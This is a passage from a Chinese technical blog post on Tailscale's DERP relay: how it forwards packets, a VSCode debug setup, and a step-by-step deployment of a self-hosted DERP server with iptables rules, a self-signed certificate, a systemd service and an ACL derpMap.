client2</strong>，并期望能从 <strong>client2</strong> 中接收到相同的数据。数据的实际流向应该是 <code>client1 → derp1 → derp2 → client2</code>。具体来说：</p><ol><li>prober 在令 client1 发送数据时，client1 会调用 <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_client.go#L225">derp_client.Send</a> 函数，在这个 data 前包裹上 frameSendPacket 枚举和 client2 的 dstKey 目的地址，使得构成一个 <strong>Frame packet</strong>。</li><li>这个 Frame packet 将会被 client1 先发送给 derp1（因为 client1 不了解 client2 的地址）</li><li>derp1 在<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go#L799-L800">接收到 Frame Packet</a> 后，会进入 handleFrameSendPacket 函数进行处理。<ol><li><p><strong>假如 client1 和 client2 连接的是同一个 Region</strong>（即 derp1 和 derp2 是同一个，只是逻辑上我们将它们分开来），那么 derp1 事实上是拥有 client2 在 derp1 这里所对应的 sclient2 结构体，则 derp1 会直接<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go#L1012-L1017">发送 raw packet</a> 给 sclient2。</p><p>该 raw packet 里会附带上传入数据的<strong>原始来源节点的 key</strong>（实际上就是每个节点所持有的公钥），相当于是把数据来源方的 ID 保存在了 raw packet 里。</p><p>sclient2 在接收到这个 raw packet 后会生成 frameRecvPacket 给 client2。如此 client2 便可以调用 Recv 函数来获取其他节点发送给 client2 的数据。</p></li><li><p>假如 client1 和 client2 连接的是独立的 Region，那么由于 derp1 也不知道 client2 的具体地址，它就会去<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go#L985">获取知道 client2 地址的 fowarder 句柄</a>（在这里是一个 连接着 derp2 的 sclient 结构体）。通过该 fowwarder 句柄将消息从 derp1 传输给 derp2，并由 derp2 来将消息传递给 sclient2，并最终发送给 client2。</p><blockquote><p>forward 操作只会执行一次，不会执行第二次。</p></blockquote><p>那么 derp1 是怎么知道<em>要找 client2 得先找 derp2</em> 呢？这就跟上面 <code>2.b</code> 提到的 client 状态广播机制有关。在启动 derp 服务时，参数中可以指定其他多个处于同一个 region Node 的 mesh 节点，derp 服务会依次向这些 mesh 内的 derp 节点发起连接，并 watch 这些节点的 client 连接状态，以维护 derp 服务的 fwd 状态。</p><blockquote><p>不过这些就太细节了，没什么必要追究的了。</p></blockquote></li></ol></li></ol></li></ol><h2 id="五、Tailscale-调试环境搭建">五、Tailscale 调试环境搭建</h2><p>如果需要单步调试相关逻辑的话，需要手动 <strong>git clone tailscale 仓库至本地</strong>来调试，不能直接用 <code>~/go/pkg/mod/tailscale.com@v1.50.1</code> 底下的，因为这里的文件夹<strong>没有写权限</strong>。</p><p>本人使用的 VSCode launch.json 如下，注意 <code>program</code> 一栏只能指定到文件夹，不能指定到具体的 go 代码，因为这会让调试器无法找到多文件项目中其他 go 代码，导致符号缺失：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="comment">// 使用 IntelliSense 了解相关属性。 </span></span><br><span class="line">    <span class="comment">// 悬停以查看现有属性的描述。</span></span><br><span class="line">    <span class="comment">// 欲了解更多信息，请访问: https://go.microsoft.com/fwlink/?linkid=830387</span></span><br><span class="line">    <span class="attr">&quot;version&quot;</span><span class="punctuation">:</span> <span class="string">&quot;0.2.0&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;configurations&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Launch derpprobe&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;go&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;request&quot;</span><span class="punctuation">:</span> <span class="string">&quot;launch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;mode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;auto&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;program&quot;</span><span class="punctuation">:</span> <span class="string">&quot;cmd/derpprobe&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;args&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">                <span class="string">&quot;-derp-map&quot;</span><span class="punctuation">,</span> <span class="string">&quot;file:///home/kiprey/derp-map.json&quot;</span><span class="punctuation">,</span></span><br><span class="line">                <span class="string">&quot;-once&quot;</span></span><br><span class="line">            <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;cwd&quot;</span><span class="punctuation">:</span> <span class="string">&quot;$&#123;workspaceFolder&#125;&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;env&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">                <span class="comment">// 去除代理设置</span></span><br><span class="line">                <span class="attr">&quot;ALL_PROXY&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span> <span class="attr">&quot;all_proxy&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span></span><br><span class="line">                <span class="attr">&quot;HTTP_PROXY&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span> <span class="attr">&quot;http_proxy&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span></span><br><span class="line">                <span class="attr">&quot;HTTPS_PROXY&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span> <span class="attr">&quot;https_proxy&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span></span><br><span class="line">            <span class="punctuation">&#125;</span></span><br><span class="line">        <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Launch derp&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;go&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;request&quot;</span><span class="punctuation">:</span> <span class="string">&quot;launch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;mode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;auto&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;program&quot;</span><span class="punctuation">:</span> <span class="string">&quot;cmd/derper&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;args&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">                <span class="string">&quot;-c&quot;</span><span class="punctuation">,</span> <span class="string">&quot;/home/kiprey/.derper.key&quot;</span><span class="punctuation">,</span></span><br><span class="line">                <span class="string">&quot;-a&quot;</span><span class="punctuation">,</span> <span class="string">&quot;:8888&quot;</span><span class="punctuation">,</span> <span class="string">&quot;-stun-port&quot;</span><span class="punctuation">,</span> <span class="string">&quot;8889&quot;</span><span class="punctuation">,</span> </span><br><span class="line">                <span class="string">&quot;-http-port&quot;</span><span class="punctuation">,</span> <span class="string">&quot;-1&quot;</span><span class="punctuation">,</span></span><br><span class="line"></span><br><span class="line">                <span class="string">&quot;-hostname&quot;</span><span class="punctuation">,</span> <span class="string">&quot;kiprey-derp&quot;</span><span class="punctuation">,</span></span><br><span class="line">                <span class="string">&quot;--certmode&quot;</span><span class="punctuation">,</span> <span class="string">&quot;manual&quot;</span><span class="punctuation">,</span></span><br><span class="line">                <span class="string">&quot;-certdir&quot;</span><span class="punctuation">,</span> <span class="string">&quot;./certdir&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;cwd&quot;</span><span class="punctuation">:</span> <span class="string">&quot;$&#123;workspaceFolder&#125;&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><h2 id="六、DERP-搭建总结演示">六、DERP 搭建总结演示</h2><p>这一节我将整合上面的所有内容，从头到尾以最短篇幅描述搭建一个 DERP 服务器的操作流程。</p><p><strong>重申：当前使用的 tailscale 版本为 v1.52.1 (2023/11/11)，git commit 为 <a href="https://github.com/tailscale/tailscale/commit/86c8ab7502a38b4de05308355fe0c847e4e78167">86c8ab75.</a></strong></p><blockquote><p>这里重点说明一下 tailscale 版本，因为 Tailscale 迭代升级速度很快，可能一两年后该文章就不再适用了（捂脸）</p></blockquote><h3 id="1-前置条件">1. 前置条件</h3><p>只有一个要求，那就是<strong>一个允许通过 TLS 流量的 TCP 协议的公共信道以及一个 UDP 协议的公共信道</strong>。</p><p>无需域名、无需 TLS 证书、无需修改任何源代码、也无需自行部署 Headscale 等等，找个内网穿透服务就能建。</p><p>这里说的比较抽象，实际上就是要么是<strong>一个 TCP 端口和一个 UDP 端口</strong>，要么就是<strong>一个端口同时允许 TCP 和 UDP 通信（mix-port）</strong>。如果不想运行 stun 服务只想搭建 derp 中转服务的话，则无需 UDP 端口。</p><p>但无论如何，TCP 端口都 <strong>不得限制 TLS 流量的通过</strong>，通常这种限制会来自于运营商（例如家用公网 IP 部署）或者内网穿透服务商（服务商要对穿透内容负责，因此可能需要实名认证等方式才能放行用户的 TLS 流量）。</p><h3 id="2-安装-DERP">2. 安装 DERP</h3><blockquote><p>以下所有命令全部在 DERP 服务器上运行。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 去 https://go.dev/dl/ 下载最新版（一定要下载版本，而非 apt-get install golang）</span></span><br><span class="line">wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">rm</span> -rf /usr/local/go &amp;&amp; <span class="built_in">sudo</span> tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">rm</span> go1.21.4.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">export</span> PATH=<span class="variable">$PATH</span>:/usr/local/go/bin</span><br><span class="line"></span><br><span class="line"><span class="comment"># 确定安装是否g成功 </span></span><br><span class="line">go version</span><br><span class="line"><span class="comment"># 查看 GOROOT 和 GOPATH 是否不为空 &amp; 可访问</span></span><br><span class="line">go <span class="built_in">env</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 配置 go 代理并安装</span></span><br><span class="line">go <span class="built_in">env</span> -w GOPROXY=https://goproxy.cn,direct</span><br><span class="line">go install tailscale.com/cmd/derper@latest</span><br><span class="line"><span class="comment"># 安装 derp probe 协助测试 derper</span></span><br><span class="line">go install tailscale.com/cmd/derpprobe@latest</span><br></pre></td></tr></table></figure><h3 id="3-启动-DERP">3. 启动 DERP</h3><p>配置端口暴露至公网。这一步既可以通过内网穿透完成，也可以配置已有暴露至公网的机器的 iptables 策略：</p><blockquote><p>请注意：iptables 策略有优先级之分，一定要插到 DROP all 之前。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 配置 TCP 入站，将允许 dest-port 为 8888 的 TCP 连接规则插入 iptables 中的第 10 条</span></span><br><span class="line"><span class="built_in">sudo</span> iptables -I INPUT 10 -p tcp --dport 8888 -j ACCEPT</span><br><span class="line"><span class="comment"># 配置 UDP 入站，将允许 dest-port 为 8889 的 UDP 连接规则插入 iptables 中的第 10 条</span></span><br><span class="line"><span class="built_in">sudo</span> iptables -I INPUT 10 -p udp --dport 8889 -j ACCEPT</span><br><span class="line"></span><br><span class="line"><span class="comment"># --------------</span></span><br><span class="line"><span class="comment"># 查看 iptables</span></span><br><span class="line">$ <span class="built_in">sudo</span> iptables -L -n</span><br><span class="line">Chain INPUT (policy ACCEPT)</span><br><span class="line">target     prot opt <span class="built_in">source</span>               destination</span><br><span class="line">ACCEPT     icmp --  0.0.0.0/0            0.0.0.0/0</span><br><span class="line">...</span><br><span class="line">ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:8889</span><br><span class="line">ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:8888</span><br><span class="line">DROP       all  --  0.0.0.0/0            0.0.0.0/0</span><br></pre></td></tr></table></figure><p>接下来，配置并启动 DERP 服务。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 指定 DERP_HOST 为 kiprey-derp（后面会用）</span></span><br><span class="line">DERP_HOST=<span class="string">&quot;kiprey-derp&quot;</span></span><br><span class="line">DERP_PORT=8888</span><br><span class="line">STUN_PORT=8889</span><br><span class="line"></span><br><span class="line"><span class="comment"># 创建自签名证书</span></span><br><span class="line"><span class="built_in">mkdir</span> ~/certdir &amp;&amp; <span class="built_in">cd</span> ~/certdir</span><br><span class="line">openssl genpkey -algorithm RSA -out <span class="variable">$&#123;DERP_HOST&#125;</span>.key   </span><br><span class="line">openssl req -new -key <span class="variable">$&#123;DERP_HOST&#125;</span>.key -out <span class="variable">$&#123;DERP_HOST&#125;</span>.csr</span><br><span class="line">openssl x509 -req \</span><br><span class="line">-days 36500 \</span><br><span class="line">-<span class="keyword">in</span> <span class="variable">$&#123;DERP_HOST&#125;</span>.csr \</span><br><span class="line">-signkey <span class="variable">$&#123;DERP_HOST&#125;</span>.key \</span><br><span class="line">-out <span class="variable">$&#123;DERP_HOST&#125;</span>.crt \</span><br><span class="line">-extfile &lt;(<span class="built_in">printf</span> <span class="string">&quot;subjectAltName=DNS:<span class="variable">$&#123;DERP_HOST&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 启动 DERP 服务（中继和stun）</span></span><br><span class="line"><span class="comment"># --verify-clients 需要本地运行 tailscaled，我在这里省略了安装 tailscale 的步骤</span></span><br><span class="line">~/go/bin/derper \</span><br><span class="line">    -c ~/.derper.key \</span><br><span class="line">    -a :<span class="variable">$&#123;DERP_PORT&#125;</span> -http-port -1 \</span><br><span class="line">    -stun-port <span class="variable">$&#123;STUN_PORT&#125;</span> \</span><br><span class="line">    -hostname <span class="variable">$&#123;DERP_HOST&#125;</span> \</span><br><span class="line">    --certmode manual \</span><br><span class="line">    -certdir ~/certdir \</span><br><span class="line">    --verify-clients</span><br></pre></td></tr></table></figure><p>启动 DERP 服务后，在<strong>另一台机器上</strong>做连通性测试：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 这里的 DERP_HOST 要与 DERP 服务上的一致</span></span><br><span class="line">DERP_HOST=<span class="string">&quot;kiprey-derp&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 以下是 DERP 服务的公网视角，即如何从公网连接其地址和端口。</span></span><br><span class="line"><span class="comment"># 如果存在端口转发，则这里的端口会和上面 DERP 服务本地监听的端口不同，请自行配置</span></span><br><span class="line">DERP_PUB_IP=<span class="string">&quot;a.b.c.d&quot;</span></span><br><span class="line">DERP_PUB_PORT=8888</span><br><span class="line">STUN_PUB_PORT=8889</span><br><span class="line"></span><br><span class="line">$ <span class="built_in">unset</span> all_proxy http_proxy https_proxy</span><br><span class="line">$ curl --insecure --resolve <span class="string">&quot;<span class="variable">$&#123;DERP_HOST&#125;</span>:<span class="variable">$&#123;DERP_PUB_PORT&#125;</span>:<span class="variable">$&#123;DERP_PUB_IP&#125;</span>&quot;</span> <span class="string">&quot;https://<span class="variable">$&#123;DERP_HOST&#125;</span>:<span class="variable">$&#123;DERP_PUB_PORT&#125;</span>&quot;</span></span><br><span class="line"></span><br><span class="line">&lt;html&gt;&lt;body&gt;</span><br><span class="line">&lt;h1&gt;DERP&lt;/h1&gt;</span><br><span class="line">&lt;p&gt;</span><br><span class="line">  This is a</span><br><span class="line">  &lt;a href=<span class="string">&quot;https://tailscale.com/&quot;</span>&gt;Tailscale&lt;/a&gt;</span><br><span class="line">  &lt;a href=<span class="string">&quot;https://pkg.go.dev/tailscale.com/derp&quot;</span>&gt;DERP&lt;/a&gt;</span><br><span class="line">  server.</span><br><span class="line">&lt;/p&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 测试 UDP 协议 STUN 服务的连通性</span></span><br><span class="line">$ nc <span class="variable">$&#123;DERP_PUB_IP&#125;</span> <span class="variable">$&#123;STUN_PUB_PORT&#125;</span> -v -u</span><br><span class="line"></span><br><span class="line">Connection to a.b.c.d e port [udp/*] succeeded!</span><br></pre></td></tr></table></figure><p>连通性测试通过后，DERP 服务器上先<strong>关闭 derp 服务</strong>，创建 service 来让它开机自启：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">DERP_HOST=<span class="string">&quot;kiprey-derp&quot;</span></span><br><span class="line">DERP_PORT=8888</span><br><span class="line">STUN_PORT=8889</span><br><span class="line"></span><br><span class="line"><span class="comment"># 创建service文件</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;[Unit]</span></span><br><span class="line"><span class="string">Description=Tailscale derp service</span></span><br><span class="line"><span class="string">After=network.target</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[Service]</span></span><br><span class="line"><span class="string">ExecStart=/home/<span class="variable">$&#123;USER&#125;</span>/go/bin/derper \</span></span><br><span class="line"><span class="string">    -c /home/<span class="variable">$&#123;USER&#125;</span>/.derper.key \</span></span><br><span class="line"><span class="string">    -a :<span class="variable">$&#123;DERP_PORT&#125;</span> -http-port -1 \</span></span><br><span class="line"><span class="string">    -stun-port <span class="variable">$&#123;STUN_PORT&#125;</span> \</span></span><br><span class="line"><span class="string">    -hostname <span class="variable">$&#123;DERP_HOST&#125;</span> \</span></span><br><span class="line"><span class="string">    --certmode manual \</span></span><br><span class="line"><span class="string">    -certdir /home/<span class="variable">$&#123;USER&#125;</span>/certdir \</span></span><br><span class="line"><span class="string">    --verify-clients</span></span><br><span class="line"><span class="string">Restart=always</span></span><br><span class="line"><span class="string">User=<span class="variable">$&#123;USER&#125;</span></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[Install]</span></span><br><span class="line"><span class="string">WantedBy=multi-user.target&quot;</span> \</span><br><span class="line">| <span class="built_in">sudo</span> <span class="built_in">tee</span> /etc/systemd/system/tailscale-derp.service</span><br><span class="line"></span><br><span class="line"><span class="comment"># 重新加载Systemd配置</span></span><br><span class="line"><span class="built_in">sudo</span> systemctl daemon-reload</span><br><span class="line"></span><br><span class="line"><span class="comment"># 启动服务并设置开机自启动</span></span><br><span class="line"><span class="built_in">sudo</span> systemctl start tailscale-derp</span><br><span class="line"><span class="built_in">sudo</span> systemctl <span class="built_in">enable</span> tailscale-derp</span><br><span class="line"></span><br><span class="line"><span class="comment"># 查看服务状态，没问题就行</span></span><br><span class="line"><span class="comment"># 如果有问题那就得看看是不是之前的 derper 忘记关了，导致端口占用</span></span><br><span class="line"><span class="built_in">sudo</span> systemctl status tailscale-derp</span><br><span class="line"></span><br><span class="line"><span class="comment"># -------------------</span></span><br><span class="line"><span class="comment"># 如需禁用</span></span><br><span class="line"><span class="built_in">sudo</span> systemctl stop tailscale-derp</span><br><span class="line"><span class="built_in">sudo</span> systemctl <span class="built_in">disable</span> tailscale-derp</span><br></pre></td></tr></table></figure><blockquote><p>到这里后，DERP 服务配置完成。</p></blockquote><h3 id="4-配置-ACL">4. 配置 ACL</h3><p>接下来要去 Tailscale admin panel 网页，配置一下 ACL 以更新所有 tailscale 节点的配置信息。</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">...</span><br><span class="line"><span class="attr">&quot;acls&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span>...<span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">...</span><br><span class="line"><span class="attr">&quot;ssh&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span>...<span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">  ...</span><br><span class="line"><span class="attr">&quot;derpMap&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line"><span class="attr">&quot;Regions&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line"><span class="attr">&quot;900&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line"><span class="attr">&quot;RegionID&quot;</span><span class="punctuation">:</span>   <span class="number">900</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;RegionCode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;MyDerp&quot;</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;Nodes&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line"><span class="attr">&quot;Name&quot;</span><span class="punctuation">:</span>             <span class="string">&quot;MyDerp-Name&quot;</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;RegionID&quot;</span><span class="punctuation">:</span>         <span class="number">900</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;HostName&quot;</span><span class="punctuation">:</span>         <span class="string">&quot;kiprey-derp&quot;</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;IPv4&quot;</span><span class="punctuation">:</span>             <span class="string">&quot;a.b.c.d&quot;</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;DERPPort&quot;</span><span class="punctuation">:</span>         <span class="number">8888</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;STUNPort&quot;</span><span class="punctuation">:</span>         <span class="number">8889</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;InsecureForTests&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line"><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line"><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line"><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">  ...</span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><h3 id="5-演示">5. 演示</h3><p>在网页上保存好 ACL 后，ACL 会立即下发到各个 tailscale 节点里。随便找个节点运行 netcheck，可以发现 DERP 成功添加：</p><p><img src="/2023/11/tailscale-derp/Untitled%209.png" alt="Untitled"></p><h2 id="七、参考链接">七、参考链接</h2><ul><li><a href="https://tailscale.com/kb/1232/derp-servers/">DERP Servers - Tailscale Documentation</a></li><li><a href="https://icloudnative.io/posts/custom-derp-servers/">Tailscale 基础教程：部署私有 DERP 中继服务器 - 云原生</a></li><li><a href="https://tailscale.com/kb/1118/custom-derp-servers/">Custom DERP Servers - Tailscale Documentation</a></li><li><a href="http://www.cppblog.com/peakflys/archive/2013/01/25/197562.html">p2p的原理和常见的实现方式 - cppblog</a></li><li><a href="https://tailscale.com/blog/how-nat-traversal-works/">How NAT traversal works NAT - Tailscale Blog</a></li><li>上文中的各类代码和其他较为琐碎而没记录与此处的各类 blog</li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;tailscale 是一个很好用的工具，它包含了多种高级特性（例如 Magic DNS）来方便用户的使用，主要用于异地组网。&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;这也是本人抛弃 Zerotier 选择 Tailscale 的缘故，高级特性很多用的很方便。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;tailscale 的底层机制与 zerotier 不同。&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;zerotier 会让每个客户端在&lt;strong&gt;启动时立即尝试与其他客户端的打洞&lt;/strong&gt;，并一直维持这个连接。
&lt;ul&gt;
&lt;li&gt;优点：创建链接时可以非常快速。要么早已打洞完成，要么就是百分百确定走中继节点。&lt;/li&gt;
&lt;li&gt;缺点：需要维护与所有对等节点的打洞链接，占用资源。节点一多则维护打洞的开销就比较大。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;tailscale 只会在&lt;strong&gt;需要与 peer 建立连接的时候才会尝试打洞&lt;/strong&gt;，而且最开始的流量一定是会经过 DERP 中转服务器。（非常的 Lazy…）
&lt;ul&gt;
&lt;li&gt;优点：懒加载机制无需预先维护与其他节点的任何打洞连接，无需预先维护任何状态。&lt;/li&gt;
&lt;li&gt;缺点：每次通过 tailscale 创建虚拟连接时，&lt;strong&gt;初始所创建的连接其延迟很高&lt;/strong&gt;，这会极大的影响使用体验；&lt;strong&gt;tailscale 极其依赖中继节点&lt;/strong&gt;。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
